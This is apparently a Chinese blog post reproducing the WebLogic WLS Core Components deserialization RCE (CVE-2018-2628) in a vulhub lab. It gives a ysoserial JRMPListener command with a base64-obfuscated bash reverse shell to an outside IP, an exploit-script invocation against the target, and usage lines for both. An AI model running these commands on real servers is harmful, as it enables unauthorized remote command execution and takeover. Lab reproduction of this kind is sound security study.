Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

复现环境:
vulhub
漏洞原因:
Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。
复现过程:
启动一个执行反弹shell的一个JRMP Server:
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)_第1张图片
payload:

java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 4456 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNDEuNTUuNjAvMTc3MjcgMD4mMQ==}|{base64,-d}|{bash,-i}'

使用expdb的脚本,向目标Weblogic发送数据包:
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)_第2张图片

payload:

  python weblogicUnserizlize.py 192.168.43.250 7001  ysoserial-master-8eb5cbfbf6-1.jar 192.168.43.250 4456 JRMPClient

shell反弹成功:

补充:

jar用法:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
py用法:python exploit.py  [目标 ip]  [目标 port]  [path to ysoserial]  [JRMPListener ip] [JRMPListener port] [JRMPClient]

你可能感兴趣的:(Weblogic漏洞复现,web安全)